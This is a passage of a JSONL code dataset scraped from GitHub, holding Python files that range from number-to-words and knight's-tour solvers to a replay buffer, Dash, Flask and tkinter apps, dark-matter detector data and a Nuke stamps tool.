times.'.format(key,template_uses[key]))\n\n#exportTemplates('PARSED_TEMPLATES.pop')\n\nexportPopfile(kv,outfile)\nlog.info('Exported to {0}.'.format(outfile))","repo_name":"N3X15/failtrain-30wave-popfiles","sub_path":"python/fixPopfiles.py","file_name":"fixPopfiles.py","file_ext":"py","file_size_in_byte":10967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26615799633","text":"import sys\n\n\ndef num2words(num):\n nums_20_90 = [\n \"Twenty\",\n \"Thirty\",\n \"Forty\",\n \"Fifty\",\n \"Sixty\",\n \"Seventy\",\n \"Eighty\",\n \"Ninety\",\n ]\n nums_0_19 = [\n \"Zero\",\n \"One\",\n \"Two\",\n \"Three\",\n \"Four\",\n \"Five\",\n \"Six\",\n \"Seven\",\n \"Eight\",\n \"Nine\",\n \"Ten\",\n \"Eleven\",\n \"Twelve\",\n \"Thirteen\",\n \"Fourteen\",\n \"Fifteen\",\n \"Sixteen\",\n \"Seventeen\",\n \"Eighteen\",\n \"Nineteen\",\n ]\n nums_dict = {\n 100: \"hundred\",\n 1000: \"thousand\",\n 1000000: \"million\",\n 1000000000: \"billion\",\n }\n if num < 20:\n return nums_0_19[num]\n if num < 100:\n return nums_20_90[num // 10 - 2] + (\n \"\" if num % 10 == 0 else \" \" + nums_0_19[num % 10]\n )\n # find the largest key smaller than num\n maxkey = max([key for key in nums_dict.keys() if key <= num])\n return (\n num2words(num // maxkey)\n + \" \"\n + nums_dict[maxkey]\n + (\"\" if num % maxkey == 0 else \" \" + num2words(num % maxkey))\n )\n\n\ndef float2words(num: str) -> str:\n if num == \"\":\n return \"\"\n num_str: str = num\n dct = {\n \"0\": \"zero \",\n \"1\": \"one \",\n \"2\": \"two \",\n \"3\": \"three \",\n \"4\": \"four \",\n \"5\": \"five \",\n \"6\": \"six \",\n \"7\": \"seven \",\n \"8\": \"eight \",\n \"9\": \"nine \",\n }\n ret = \" point \"\n\n for c in num_str:\n ret += dct[c]\n return ret\n\n\ndef convert(a: str, b: str) -> str:\n ret: str = a + b\n ret = ret.lower()\n head_word = ret.split(\" \")[0][0].upper() + ret.split(\" \")[0][1:]\n other_words = ret.split(\" \")[1:]\n ret = head_word + \" \"\n for w in other_words:\n ret += w + \" \"\n return ret\n\n\ndef main(lines):\n num_seisu: int = int(float(lines[0]))\n if \".\" in lines[0]:\n num_syousu = lines[0].split(\".\")[1]\n else:\n num_syousu = \"\"\n seisu_str: str = num2words(num_seisu)\n syousu_str: str = float2words(num_syousu)\n print(convert(seisu_str, syousu_str))\n\n\nif __name__ == \"__main__\":\n lines = []\n for l in sys.stdin:\n lines.append(l.rstrip(\"\\r\\n\"))\n main(lines)\n","repo_name":"mei28/Competitive-programing","sub_path":"money_forward2021/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9225498451","text":"import torch\n\n\ndef unsqueeze_like(tensor: torch.Tensor, like: torch.Tensor, dim=0):\n \"\"\"\n Unsqueeze last dimensions of tensor to match another tensor's number of dimensions.\n\n Args:\n tensor (torch.Tensor): tensor to unsqueeze\n like (torch.Tensor): tensor whose dimensions to match\n dim: int: starting dim, default: 0.\n \"\"\"\n n_unsqueezes = like.ndim - tensor.ndim\n if n_unsqueezes < 0:\n raise ValueError(f\"tensor.ndim={tensor.ndim} > like.ndim={like.ndim}\")\n elif n_unsqueezes == 0:\n return tensor\n else:\n return tensor[dim * (slice(None),) + (None,) * 
n_unsqueezes]\n","repo_name":"DavidRuhe/clifford-group-equivariant-neural-networks","sub_path":"models/modules/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"12717949758","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom interp import interp1d\nfrom globalfnc import ConfidenceLevel, chi_squared1\npi = np.pi\n\nname = \"PICASSO\"\nmodulated = False\n\nenergy_resolution_type = \"Dirac\"\n# actually Bubble Nucleation, but similar enough to implement like Dirac\n\ndef EnergyResolution(e):\n return 0.5 * np.ones_like(e)\n\nFFSD = 'GaussianFFSD'\nFFSI = 'HelmFF'\nFF = {'SI': FFSI,\n 'SDPS': FFSD,\n 'SDAV': FFSD,\n }\ntarget_nuclide_AZC_list = np.array([[19, 9, 0.7981563864573104]])\ntarget_nuclide_JSpSn_list = \\\n np.array([[1./2, 0.4751 * np.sqrt(3./2 / pi), -0.0087 * np.sqrt(3./2 / pi)]])\ntarget_nuclide_mass_list = np.array([17.6969])\nnum_target_nuclides = target_nuclide_mass_list.size\n\ndef QuenchingFactor(e):\n return np.ones_like(e)\n\nEthreshold = 1.7\nEmaximum = 100\nERmaximum = np.inf\n\ndef Efficiency_ER(er):\n return np.ones_like(er)\n\nalpha = 5.\ndef Efficiency(e, er):\n return 1. - np.exp(alpha * (1. - er/e))\n\nExposure = 1. # not needed\nERecoilList = np.array([])\n\nBinSize = 1\n# BinEdges are actually threshold energies\nBinEdges_left = np.array([1.723498, 2.900465, 4.098237, 5.813693, 6.896901,\n 16.334835, 38.841959, 54.882078])\nBinEdges_right = 100 * np.ones(BinEdges_left.size)\n# BinData are rate values\nBinData = np.array([-6.027919, -0.317259, 1.586294, -0.190355, 0.,\n 1.395939, -0.253807, 1.332487])\n# BinError are rate errors\nBinError = np.array([7.170051, 1.77665, 9.073604, 9.200507, 1.269036,\n 1.649746, 1.77665, 4.63198])\nExpected_limit = BinData + np.sqrt(chi_squared1(ConfidenceLevel)) * BinError\n","repo_name":"Andreea-G/Codds_DarkMatter","sub_path":"src/Data/PICASSO.py","file_name":"PICASSO.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"45584420708","text":"# DRL-5G-Scheduler; Author: Zhouyou Gu (zhouyou.gu@sydney.edu.au);\n# Supervisors: Wibowo Hardjawana; Branka Vucetic;\n# This project is developed at Centre for IoT and Telecommunications at The University of Sydney,\n# under a project directly funded by Telstra Corporation Ltd., titled\n# ”Development of an Open Programmable Scheduler for LTE Networks”, from 2018 to 2019.\n# Reference: Z. Gu, C. She, W. Hardjawana, S. Lumb, D. McKechnie, T. Essery, and B. 
Vucetic,\n# “Knowledge-assisted deep reinforcement learning in 5G scheduler design:\n# From theoretical framework to implementation,” IEEE JSAC., to appear, 2021\n\nimport random\nfrom collections import namedtuple, deque\nfrom threading import Lock\n\nimport numpy as np\n\nfrom sim_src import StatusObject\nfrom sim_src.tb_logger import GLOBAL_LOGGER\n\n\nclass ReplayMemory(StatusObject):\n def save_step(self, state, action, reward, next_state, done, asynchronization=False):\n \"\"\"Add a new experience to memory.\n :param asynchronization:\n \"\"\"\n pass\n\n def sample(self, asynchronization=False):\n \"\"\"Randomly sample a batch of experiences from memory.\n :param asynchronization:\n \"\"\"\n pass\n\n def get_id(self):\n pass\n\n def get_size(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n pass\n\n def training_info(self, batch, training_info):\n pass\n\n\nSIM_REPLAY_MEMORY_CONFIG = namedtuple(\"SIM_REPLAY_MEMORY_CONFIG\", [\"batch_size\", \"buffer_size\", \"seed\"])\n\n\nclass SimReplayMemory(ReplayMemory):\n \"\"\"Fixed-size buffer to store experience tuples.\"\"\"\n\n def __init__(self, id, config):\n \"\"\"Initialize a ReplayBuffer object.\n Params\n ======\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n \"\"\"\n self.id = id\n self.config = config\n\n GLOBAL_LOGGER.get_tb_logger().add_text_of_object(\"REPLAY_MEMORY_CONFIG\", self.config)\n\n self.memory = deque(maxlen=self.config.buffer_size) # internal memory (deque)\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(self.config.seed)\n self.step_lock = Lock()\n self.sample_lock = Lock()\n self.sample_lock.acquire() # allow save_step first\n\n def save_step(self, state, action, reward, next_state, done, asynchronization=False):\n \"\"\"Add a new experience to memory.\n :param asynchronization:\n \"\"\"\n if not asynchronization:\n self.step_lock.acquire()\n\n # self._print(\"step\")\n self.async_save_step(state, action, reward, next_state, done)\n\n if not asynchronization:\n self.sample_lock.release()\n\n def sample(self, asynchronization=False):\n \"\"\"Randomly sample a batch of experiences from memory.\n :param asynchronization:\n \"\"\"\n if not asynchronization:\n self.sample_lock.acquire()\n\n # self._print(\"sample\")\n ret = self.async_sample()\n\n if not asynchronization:\n self.step_lock.release()\n return ret\n\n def get_id(self):\n return self.id\n\n def get_size(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory)\n\n def status(self):\n print(\"len of memory\", len(self.memory), \"max size of memory\", self.memory.maxlen)\n\n def async_sample(self):\n if self.get_size() < self.config.batch_size * 10 and self.get_size() < self.config.buffer_size:\n ret = None\n else:\n experiences = random.sample(self.memory, k=self.config.batch_size)\n states = np.vstack([e.state for e in experiences if e is not None])\n actions = np.vstack([e.action for e in experiences if e is not None])\n rewards = np.vstack([e.reward for e in experiences if e is not None])\n next_states = np.vstack([e.next_state for e in experiences if e is not None])\n dones = np.vstack([e.done for e in experiences if e is not None])\n\n ret = (states, actions, rewards, next_states, dones)\n return ret\n\n def async_save_step(self, state, action, reward, next_state, done):\n e = self.experience(state, action, reward, next_state, done)\n 
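# deque(maxlen=buffer_size) evicts the oldest experience automatically once the buffer is full\n        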
self.memory.append(e)\n\n\nif __name__ == '__main__':\n print(\"test deque dropout when maxlen is reached\")\n deque_size = 5\n test_memory = deque(maxlen=deque_size)\n for i in range(deque_size + 5):\n test_memory.append(i)\n print(test_memory)\n experiences = random.sample(test_memory, k=int(deque_size / 2))\n print(experiences)\n print(test_memory.maxlen)\n print((1, 2))\n\n\n class TestReplayMemory(ReplayMemory):\n \"\"\"Fixed-size buffer to store experience tuples.\"\"\"\n\n def __init__(self, id, batch_size, buffer_size, seed):\n \"\"\"Initialize a ReplayBuffer object.\n Params\n ======\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n \"\"\"\n self.id = id\n self.batch_size = batch_size\n self.memory = deque(maxlen=buffer_size) # internal memory (deque)\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(seed)\n self.step_lock = Lock()\n self.sample_lock = Lock()\n self.sample_lock.acquire() # allow save_step first\n\n def step(self, state, action, reward, next_state, done):\n \"\"\"Add a new experience to memory.\"\"\"\n self.step_lock.acquire()\n\n print(\"save_step\")\n\n self.sample_lock.release()\n\n def sample(self):\n \"\"\"Randomly sample a batch of experiences from memory.\"\"\"\n\n self.sample_lock.acquire()\n\n print(\"sample\")\n\n self.step_lock.release()\n\n def get_id(self):\n return self.id\n\n def get_size(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory)\n\n def status(self):\n print(\"len of memory\", len(self.memory), \"max size of memory\", self.memory.maxlen)\n\n\n test_memory = TestReplayMemory(id=1, batch_size=5, buffer_size=5, seed=0)\n\n\n def step():\n while True:\n i = 1\n test_memory.step(1, 1, 1, 1, 1)\n # print(\"save_step\")\n\n\n def sample():\n while True:\n i = 1\n test_memory.sample()\n # print(\"sample\")\n\n\n from threading import Thread\n\n Thread_a = Thread(None, step)\n Thread_b = Thread(None, sample)\n\n Thread_a.start()\n Thread_b.start()\n","repo_name":"zhouyou-gu/drl-5g-scheduler","sub_path":"controller_src/sim_src/replay_memory/replay_memory.py","file_name":"replay_memory.py","file_ext":"py","file_size_in_byte":6792,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"73503858988","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport copy\r\nimport os\r\nimport sys\r\n\r\nfrom common.common import TreeNode, buildTestTree\r\n\r\nproject_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\r\nsys.path.insert(0, project_dir)\r\n\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution(object):\r\n def tree2str(self, t):\r\n \"\"\"\r\n :type t: TreeNode\r\n :rtype: str\r\n \"\"\"\r\n if not t:\r\n return \"\"\r\n\r\n if not t.left and not t.right:\r\n return str(t.val)\r\n\r\n if not t.left:\r\n return str(t.val) + \"()(\" + self.tree2str(t.right) + \")\"\r\n\r\n if not t.right:\r\n return str(t.val) + \"(\" + self.tree2str(t.left) + \")\"\r\n\r\n return str(t.val) + \"(\" + self.tree2str(t.left) + \")(\" + self.tree2str(t.right) + \")\"\r\n\r\n def tree2strIter(self, t):\r\n if not t:\r\n return \"\"\r\n\r\n res = \"\"\r\n layer = [t]\r\n while layer:\r\n ele = layer.pop(0)\r\n if ele == \")\":\r\n res += ele\r\n else:\r\n res += \"(\" + 
str(ele.val)\r\n            if not ele.left and ele.right:\r\n                res += \"()\"\r\n            if ele.right:\r\n                layer = [ele.right, \")\"] + layer\r\n            if ele.left:\r\n                layer = [ele.left, \")\"] + layer\r\n\r\n        return res[1:]\r\n\r\n\r\nif __name__ == '__main__':\r\n    pass\r\n","repo_name":"cqxmzhc/my_leetcode_solutions","sub_path":"606-ConstructStringfromBinaryTree/ConstructStringfromBinaryTree.py","file_name":"ConstructStringfromBinaryTree.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}{"seq_id":"37460561532","text":"# -*- coding=utf-8 -*-\n# @Time : 2022/10/30 11:59\n# @Author : ╰☆H.俠ゞ\n# =============================================================\nimport random\nimport time\n\nimport jsonpath\nimport requests\nfrom utils import get_md5\nhost = r'http://82.156.74.26:9088/'\n\n\ndef demo_get():\n    # prefix the shared host: requests needs an absolute URL, not a bare path\n    res = requests.get(host + \"/pinter/com/getSku?id=1\")\n    print(res.json())\n\n\ndef demo_random_tel():\n    url = host + \"/pinter/com/userInfo\"\n    header = {\n        'Content-Type': 'application/json'\n    }\n    json = {\"phoneNum\": \"123434\", \"optCode\": \"testfan\", \"timestamp\": \"1667103266\", \"sign\": \"your sign data\"}\n    first_three_num = [\"157\", \"158\", \"189\", \"136\", \"137\", \"173\", \"188\"]\n    # choice() picks a single item from a sequence; sample() picks the given number of items\n    telephone = random.choice(first_three_num) + str(random.randint(10000000, 99999999))\n    print(telephone)\n    timestamp = round(time.time()*1000)\n    toSign = f'{telephone}testfan{timestamp}'\n    sign = get_md5(toSign)\n    json[\"phoneNum\"] = telephone\n    json[\"timestamp\"] = timestamp\n    json[\"sign\"] = sign\n    print(json)\n    res = requests.post(url=url, json=json, headers=header)\n    print(res.json()[\"data\"]['id']) # read the value by plain dict indexing\n    data = jsonpath.jsonpath(res.json(), '$..data.id')[0] # read the value via jsonpath\n    print(data)\n\n\nif __name__ == \"__main__\":\n    demo_random_tel()","repo_name":"superlff888/projectScripts","sub_path":"MStudent/autoTest_banXia/阶段一:python高级编程/正则/api_re.py","file_name":"api_re.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"20440573762","text":"import base64\nimport datetime\nimport io\n\nimport dash\nimport plotly.express as px\nfrom dash.dependencies import Input, Output, State\nfrom dash import dcc, html, dash_table\n\nimport pandas as pd\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, suppress_callback_exceptions=True)\n\napp.layout = html.Div([\n    dcc.Upload(\n        id='upload-data',\n        children=html.Div([\n            'Drag and Drop or ',\n            html.A('Select Files')\n        ]),\n        style={\n            'width': '100%',\n            'height': '60px',\n            'lineHeight': '60px',\n            'borderWidth': '1px',\n            'borderStyle': 'dashed',\n            'borderRadius': '5px',\n            'textAlign': 'center',\n            'margin': '10px'\n        },\n        # Allow multiple files to be uploaded\n        multiple=True\n    ),\n    html.Div(id='output-data-upload', children=[]),\n    html.Div(id='show-plottypes'),\n    # html.Button(id='submit-button', children='Create Graph'),\n    html.Div(id='output-div')\n])\n\ndef parse_contents(contents, filename, date):\n    content_type, content_string = contents.split(',')\n\n    decoded = base64.b64decode(content_string)\n    try:\n        if 'csv' in filename:\n            # Assume that the user uploaded a CSV file\n            df = pd.read_csv(\n                io.StringIO(decoded.decode('utf-8')))\n        elif 'xls' in filename:\n            # Assume that the user uploaded an excel file\n            df = pd.read_excel(io.BytesIO(decoded))\n    except 
Exception as e:\n print(e)\n return html.Div([\n 'There was an error processing this file.'\n ])\n\n return html.Div([\n html.H5(filename),\n html.H6(datetime.datetime.fromtimestamp(date)),\n\n # dash_table.DataTable(\n # df.to_dict('records'),\n # [{'name': i, 'id': i} for i in df.columns]\n # ),\n dcc.Store(id='stored-data', data=df.to_dict('records')),\n dcc.RadioItems(id='plottype',options=['line', 'bar'], value='line'), \n\n html.Hr(), # horizontal line\n\n # For debugging, display the raw contents provided by the web browser\n html.Div('Raw Content'),\n html.Pre(contents[0:200] + '...', style={\n 'whiteSpace': 'pre-wrap',\n 'wordBreak': 'break-all'\n })\n ])\n\n@app.callback(Output('output-data-upload', 'children'),\n Input('upload-data', 'contents'),\n State('upload-data', 'filename'),\n State('upload-data', 'last_modified'),\n State('output-data-upload', 'children'))\ndef update_output(list_of_contents, list_of_names, list_of_dates, odu):\n\n if list_of_contents is not None:\n children = [\n parse_contents(c, n, d) for c, n, d in\n zip(list_of_contents, list_of_names, list_of_dates)]\n odu = [children]\n print(odu)\n return children\n\n\n@app.callback(\n Output('show-plottypes', 'children'),\n Input('plottype', 'value'),\n State('stored-data', 'data')\n # State('xaxis-data', 'value'),\n # State('yaxis-data', 'value')\n)\ndef show_columns(plot_selected, data):\n # df = pd.DataFrame(data)\n print(plot_selected)\n return html.Div([\n html.P(\"Insert X axis data\"),\n dcc.Dropdown(id='xaxis-data',\n options=[{'label':x, 'value':x} for x in list(data[0].keys())]),\n html.P(\"Insert Y axis data\"),\n dcc.Dropdown(id='yaxis-data',\n options=[{'label':x, 'value':x} for x in list(data[0].keys())]),\n html.Button(id='submit-button', children='Create Graph')\n ])\n\n\n# @app.callback(Output('output-div', 'children'),\n# Input('submit-button','n_clicks'),\n# Input('plottype ', 'value'),\n# State('stored-data','data'),\n# State('xaxis-data','value'),\n# State('yaxis-data', 'value'))\n# def make_graphs(n, plottype, data, x_data, y_data):\n# print(plottype)\n# if n is None:\n# return dash.no_update\n# elif 'bar' in plottype.lower():\n# bar_fig = px.bar(data, x=x_data, y=y_data)\n# return dcc.Graph(figure=bar_fig)\n# elif 'line' in plottype.lower():\n# line_fig = px.line(data, x=x_data, y=y_data)\n# return dcc.Graph(figure=line_fig)\n# elif 'hist' in plottype.lower():\n# line_fig = px.histogram(data, x=x_data)\n# return dcc.Graph(figure=line_fig)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"ProgressingMann/Dash","sub_path":"rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6916456191","text":"import glob\r\nimport json\r\nimport tkinter as tk\r\nimport tk_func\r\nfrom functools import partial\r\n\r\ngoogle_files = glob.glob(\"google_json/*.json\")\r\nspreadsheet_files = glob.glob(\"spreadsheet_json/*.json\")\r\nwith open(google_files[0],\"r\") as f:\r\n gj_obj = json.load(f) # service\r\nwith open(spreadsheet_files[0],\"r\") as f:\r\n sj_obj = json.load(f)\r\n\r\n\r\ndef ok(ui,sj_obj):\r\n with open(spreadsheet_files[0],\"w\") as f:\r\n sj_obj[\"sheet_url\"] = f\"{ui.get_sheetbox()}\"\r\n sj_obj[\"custom_verifyFp\"] = f\"{ui.get_verify_addr()}\"\r\n sj_obj[\"interval\"] = f\"{ui.get_interval()}\"\r\n json.dump(sj_obj,f)\r\n ui.root.quit()\r\ndef cancel(ui):\r\n ui.root.quit()\r\n\r\n# gj_obj['client_email']\r\n# 
sj_obj.get(\"sheet_url\")\r\nui = tk_func.UI(gj_obj,sj_obj)\r\nui.set_okbutton(partial(ok,ui,sj_obj))\r\nui.set_cancelbutton(partial(cancel,ui))\r\nui.start()\r\n","repo_name":"yuyund/TikTokScraping","sub_path":"code/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30130168956","text":"import random \n\nwhile True:\n num_aleatorio = random.randint(1, 9)\n\n resposta = input(\"Adivinhe o número (1-9) ou digite 'sair' para encerrar o jogo: \")\n \n if resposta == \"sair\":\n print(\"Obrigado por jogar!\")\n break\n \n if int(resposta) == num_aleatorio:\n print(\"Parabéns! Você acertou o número.\")\n elif int(resposta) < num_aleatorio:\n print(\"Tente novamente! O número é maior.\")\n else:\n print(\"Tente novamente! O número é menor.\")\n","repo_name":"master-1000/exploring-AI","sub_path":"src/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6498860653","text":"###########################\n# STAMPS SCRIPT\n# version 1.0.0\n# 28 April 2022\n# damienengland.com.au\n###########################\n\n# Import Modules\nimport nuke\nimport random\n\n\n# CREATE CHILD NODE\ndef create_stamp(parent):\n\n parent_name = parent.knob('name').value()\n p_xpos = parent.xpos()\n p_ypos = parent.ypos()\n\n stamp_name = f\"{parent_name}_{random.randint(0,100000)}\"\n\n stamp = nuke.createNode('NoOp', inpanel=False)\n stamp['tile_color'].setValue(0x20101ff)\n stamp.setInput(0, nuke.toNode(parent_name))\n stamp['hide_input'].setValue(True)\n stamp['xpos'].setValue(p_xpos)\n stamp['ypos'].setValue(p_ypos + 50)\n stamp['name'].setValue(stamp_name)\n stamp['label'].setValue(\"test\")\n\n stamp_tab = nuke.Tab_Knob('stamp', 'Stamp')\n stamp.addKnob(stamp_tab)\n parent_id = nuke.String_Knob('parent_id', 'Parent ID', parent_name)\n st_divider = nuke.Text_Knob(\"divider\", \"\")\n stamp.addKnob(parent_id)\n stamp.addKnob(st_divider)\n\n auto_label = \"nuke.thisNode().knob('parent_id').value()\"\n stamp['autolabel'].setValue(auto_label)\n\n # ADD STAMP TO PARENT STAMP LIST\n current_stamp_list = parent.knob(\"stamp_list\").value()\n new_stamp_list = current_stamp_list + f\"{stamp.knob('name').value()}\\n\"\n parent.knob(\"stamp_list\").setValue(new_stamp_list)\n\n # CONNECT CHILD TO PARENT IF DISCONNECTED\n RECONNECT = \"reconnect_parent(nuke.thisNode())\"\n reconnect_btn = nuke.PyScript_Knob('reconnect', 'Reconnect', RECONNECT)\n reconnect_btn.setFlag(nuke.STARTLINE)\n stamp.addKnob(reconnect_btn)\n\n\ndef reconnect_all_stamps(parent):\n stamps = parent.knob(\"stamp_list\").value()\n stamp_list = stamps.replace(\"\\n\", \".\").split(\".\")[:-1:]\n\n new_list = \"\"\n for stamp in stamp_list:\n node = nuke.toNode(stamp)\n if node is not None:\n new_list += f\"{stamp}\\n\"\n reconnect_parent(node)\n node.setSelected(True)\n\n parent.knob(\"stamp_list\").setValue(new_list)\n\n\n# SELECT ALL STAMPS FROM LIST\ndef select_stamps(parent):\n stamps = parent.knob(\"stamp_list\").value()\n stamp_list = stamps.replace(\"\\n\", \".\").split(\".\")[:-1:]\n for stamp in stamp_list:\n nuke.toNode(stamp).setSelected(True)\n\n\n# CONNECT CHILD TO PARENT\ndef reconnect_parent(stamp):\n\n parent_name = stamp['parent_id'].value()\n parent_node = nuke.toNode(parent_name)\n\n if parent_node is None:\n nuke.message('ERROR: Unable to locate parent!')\n return\n\n stamp.setInput(0, 
parent_node)\n\n\n# UPDATE PARENT LABEL\ndef update_label(node):\n    node[\"name\"].setValue(node[\"parent_label\"].value())\n\n\n# MAIN TOOL FUNCTION\ndef create_parent():\n\n    # CREATE PARENT\n    txt = nuke.getInput('Stamp Title')\n    if txt is None:\n        return\n    else:\n        p_label = txt\n\n    parent = nuke.createNode('NoOp')\n    parent['name'].setValue(p_label)\n\n    # PARENT TAB KNOBS AND BUTTONS\n    parent_tab = nuke.Tab_Knob('stamp_parent', 'Stamp Parent')\n    parent.addKnob(parent_tab)\n    parent_label_string_knob = nuke.String_Knob('parent_label', 'Title:', p_label)\n    parent.addKnob(parent_label_string_knob)\n\n    # UPDATE LABEL\n    UPDATE_LABEL_PYSCRIPT = \"update_label(nuke.thisNode())\"\n    p_update_label = nuke.PyScript_Knob('update_label', 'Update Label', UPDATE_LABEL_PYSCRIPT)\n    parent.addKnob(p_update_label)\n\n    # DIVIDER\n    p_divider = nuke.Text_Knob(\"divider\", \"\")\n    parent.addKnob(p_divider)\n\n    # DESCRIPTOR\n    p_descriptor = nuke.Text_Knob(\"\", \"Stamps:\", \" \")\n    parent.addKnob(p_descriptor)\n\n    # CREATE STAMP\n    CREATE_STAMP_PYSCRIPT = \"create_stamp(nuke.thisNode())\"\n    p_create_stamp_btn = nuke.PyScript_Knob('create_stamp', 'Create Stamp', CREATE_STAMP_PYSCRIPT)\n    parent.addKnob(p_create_stamp_btn)\n\n    # SELECT STAMPS\n    SELECT_STAMPS_PYSCRIPT = \"select_stamps(nuke.thisNode())\"\n    p_select_stamps_btn = nuke.PyScript_Knob(\"select_stamps\", \"Select Stamps\", SELECT_STAMPS_PYSCRIPT)\n    parent.addKnob(p_select_stamps_btn)\n\n    # STAMPS LIST TAB\n    stamp_list_tab = nuke.Tab_Knob(\"stamps\", \"Stamps\")\n    parent.addKnob(stamp_list_tab)\n    stamp_list_knob = nuke.Multiline_Eval_String_Knob('stamp_list', 'Stamp Nodes', '')\n    parent.addKnob(stamp_list_knob)\n\n    # UPDATE STAMPS FROM LIST\n    RECONNECT_ALL_STAMPS_PYSCRIPT = \"reconnect_all_stamps(nuke.thisNode())\"\n\n    update_stamp_list_btn = nuke.PyScript_Knob('reconnect_all_stamps', 'Reconnect Stamps', RECONNECT_ALL_STAMPS_PYSCRIPT)\n    update_stamp_list_btn.setFlag(nuke.STARTLINE)\n    parent.addKnob(update_stamp_list_btn)\n\n    # SET DEFAULT TAB\n    parent.knob(\"stamp_parent\").setFlag(0)\n\n","repo_name":"Damiengland/stamps-nuke","sub_path":"stamps_main.py","file_name":"stamps_main.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}{"seq_id":"7884834737","text":"\ndef solveKTUtil(x, y, moves, soln):\n    def printSolution(soln):\n        # print the board one row per line instead of one cell per line\n        for row in soln:\n            print(row)\n\n    def isSafe(x, y, soln):\n        if (x >= 0 and x < 8) and (y >= 0 and y < 8) and soln[x][y] == -1:\n            return True\n        else:\n            return False\n\n    print(moves)\n    if moves == 8 * 8:\n        printSolution(soln)\n        return True\n\n    dx = [1, 2, -1, -2, -1, -2, 1, 2]\n    dy = [2, 1, 2, 1, -2, -1, -2, -1]\n\n    for k in range(len(dx)):\n        mx = x + dx[k]\n        my = y + dy[k]\n\n        if isSafe(mx, my, soln):\n            soln[mx][my] = moves\n            if solveKTUtil(mx, my, moves + 1, soln):\n                return True\n            # undo the move (backtrack); resetting outside this branch would\n            # clobber squares that were never set on this attempt\n            soln[mx][my] = -1\n    return False\n\ndef solveKT():\n    moves = 1\n    x = 0\n    y = 0\n    soln = [[-1 for _ in range(8)] for _ in range(8)]\n    soln[0][0] = 0\n    solveKTUtil(x, y, moves, soln)\n\nif __name__ == \"__main__\":\n    solveKT()\n\n\n","repo_name":"pkrishn6/problems","sub_path":"api/knightTour.py","file_name":"knightTour.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"30965903700","text":"from flask import Flask, jsonify, request\nimport pandas as pd\nimport numpy as np\nimport json\n
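# my_model.predict is assumed to be this project's own model wrapper\nfrom my_model.predict import 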
make_prediction\n\napp = Flask(__name__)\n\n@app.route('/wine', methods=['POST'])\ndef wine():\n    data = request.get_json()\n    X = data['data']\n    columns_model = ['alcohol', 'fixed acidity', 'volatile acidity',\n                    'citric acid', 'residual sugar', 'chlorides',\n                    'free sulfur dioxide', 'total sulfur dioxide', \n                    'density', 'pH', 'sulphates']\n    # Simplified for testing: any expected column missing from the request defaults to 0\n    selected_data = {column: X.get(column, 0) for column in columns_model}\n    \n    selected_df = pd.DataFrame([selected_data])\n    \n    prediction = make_prediction(input_data=selected_df)\n    prediction = prediction['predictions'][0]\n    if prediction == 1:\n        prediction = \"bad\"\n    else:\n        prediction = \"good\"\n    return jsonify(prediction), 200\n\nif __name__ == '__main__':\n    app.run(debug=True,host=\"0.0.0.0\", port=int(\"5000\"))","repo_name":"xabimich/PEC2_aesc","sub_path":"APIFlask/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"42397435300","text":"import json\nimport logging\nimport typing\n\nfrom . import (\n    RedGalaxyException,\n    global_instance,\n    SessionManager,\n    HighGravity,\n    User,\n    UtilBox,\n    UploadMedia,\n    Tweet,\n)\n\n\nclass TwitterUser:\n    def __init__(self, sessionInstance: SessionManager = None):\n        \"\"\"\n        Routes relating to getting tweets and users.\n\n        :param sessionInstance:\n        \"\"\"\n        if sessionInstance is None:\n            sessionInstance = global_instance\n        self.session = sessionInstance\n        self.gravity = HighGravity(self.session)\n        